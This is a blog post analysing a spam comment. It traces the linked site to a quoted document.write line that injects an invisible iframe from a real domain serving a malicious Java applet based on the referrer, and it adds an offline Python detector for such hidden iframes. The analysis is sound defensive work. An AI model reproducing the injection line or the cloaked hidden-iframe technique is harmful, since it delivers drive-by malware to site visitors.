Anatomy of a spam comment
by Volker Weber
[CAUTION: Do NOT load any of the URLs mentioned below]
Today I received yet another spam comment that tried to plant a link to a site which calls itself "A WebSite for creative intellectuals" and pretends to teach you how to use The Gimp. This has happened before: twice on 29.09.2004 from IP address 141.30.207.43, which belongs to the data center of the Technical University Dresden, and again from the same address on 05.06.2006. On 10.11.2006 the spammer moved to 131.188.3.20, another university address, this one belonging to the Friedrich Alexander University Erlangen-Nuernberg. The site the spammer links to belongs to a person with an address in Dresden.
If you examine the source code of the site, you will find that it loads /data.htm, which in turn loads /ad/s-block.js, which contains an interesting line:
document.write('<iframe src="http://x- road.co.kr/ric h/out.php" width=1 frameborder=0 vspace=0 hspace=0 marginwidth=0 marginheight=0 scrolling=no width=0 height=0></iframe>');
This translates to an invisible iframe (zero height, so nothing is rendered) loaded from http://x-road.co.kr/rich/out.php. The PHP script behind it evaluates the referrer and either redirects you to Yahoo.com or serves a malicious Java applet. Here is what Google has to say about this address:
And if you ask Google who links to this trap, you will find sites like sixtus.net, Schockwellenreiter, Mein Parteibuch, etc.
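To make the pattern above checkable without loading anything, here is an added example (not code from the post or from the spammer's site) that scans a loader script offline for document.write() calls injecting an iframe, and flags frames that are both invisible (a dimension of 1px or less) and point off-site. The sample script is constructed for this example and modelled on the quoted s-block.js line; the iframe host "cloaker.example" and the page host "example.org" are fictional stand-ins, so the real URL is never touched. Note the duplicated width attribute in the original line: HTML parsers keep the first occurrence, so the frame is 1px wide, and it is the height=0 that hides it.

```python
import re
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample loader script, modelled on the document.write line quoted
# on the page. The iframe host is a fictional stand-in for the real one.
SAMPLE_JS = r"""
var n = 1;
document.write('<iframe src="http://cloaker.example/rich/out.php" width=1 frameborder=0 vspace=0 hspace=0 marginwidth=0 marginheight=0 scrolling=no width=0 height=0></iframe>');
document.write("<img src=\"/ad/pixel.gif\" width=1 height=1>");
document.write('<iframe src="/ad/frame.htm" width=300 height=250></iframe>');
"""

# document.write( '...' ) or document.write( "..." ) with a string literal.
DOC_WRITE_RE = re.compile(r"""document\.write\s*\(\s*(['"])(.*?)\1\s*\)""", re.DOTALL)


def unescape_js_string(s):
    """Undo simple backslash escapes (\\" \\' \\/) inside a JS string literal."""
    return re.sub(r"\\(.)", r"\1", s)


class IframeCollector(HTMLParser):
    """Collect <iframe> start tags from an HTML fragment, keeping the FIRST
    value of any duplicated attribute, which is what browsers do."""

    def __init__(self):
        super().__init__()
        self.iframes = []

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        first = {}
        for name, value in attrs:
            first.setdefault(name, value)  # later width=0 does not override width=1
        self.iframes.append(first)


def pixels(value):
    """Parse a width/height attribute ("0", "1", "300px") to an int, or None."""
    if value is None:
        return None
    m = re.match(r"\s*(\d+)", value)
    return int(m.group(1)) if m else None


def audit_loader_script(js_text, page_host):
    """Return one finding per iframe injected via document.write().

    A finding is 'suspicious' when the frame is effectively invisible
    (width or height of 1px or less) AND its src points at a host other
    than page_host, i.e. the hidden off-site iframe pattern discussed above.
    """
    findings = []
    for _quote, literal in DOC_WRITE_RE.findall(js_text):
        collector = IframeCollector()
        collector.feed(unescape_js_string(literal))
        for attrs in collector.iframes:
            src = attrs.get("src", "")
            host = urlparse(src).netloc.lower()
            width, height = pixels(attrs.get("width")), pixels(attrs.get("height"))
            hidden = any(d is not None and d <= 1 for d in (width, height))
            offsite = bool(host) and host != page_host.lower()
            findings.append({
                "src": src,
                "host": host,
                "width": width,
                "height": height,
                "hidden": hidden,
                "offsite": offsite,
                "suspicious": hidden and offsite,
            })
    return findings


def audit_sample():
    """Run the audit over the constructed sample as if served from example.org."""
    return audit_loader_script(SAMPLE_JS, "example.org")


if __name__ == "__main__":
    for f in audit_sample():
        flag = "SUSPICIOUS" if f["suspicious"] else "ok"
        print(f"{flag:10} {f['width']}x{f['height']} -> {f['src']}")
```

Run it against a copy of the script obtained by other means (a saved file, a proxy log); do not fetch the live URL. Since the page notes that out.php decides what to serve based on the referrer, any follow-up inspection of the frame's target has to account for that: a request without the expected Referer will only show you the harmless redirect.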
Comments
Very interesting! Thank you.
Perhaps someone should bring this to Google AdSense's attention, because either this is a large AdSense customer (recognizable by the missing Google logo in the ad displayed below), or the guys have modified the AdSense script, which is not allowed. As far as I know, "google_hints", for example, is still in the test phase and only available to selected customers.
By the way, for me "/data.htm" does not call "/ad/s-block.js" but "/ad/h-block.js".
It loads both.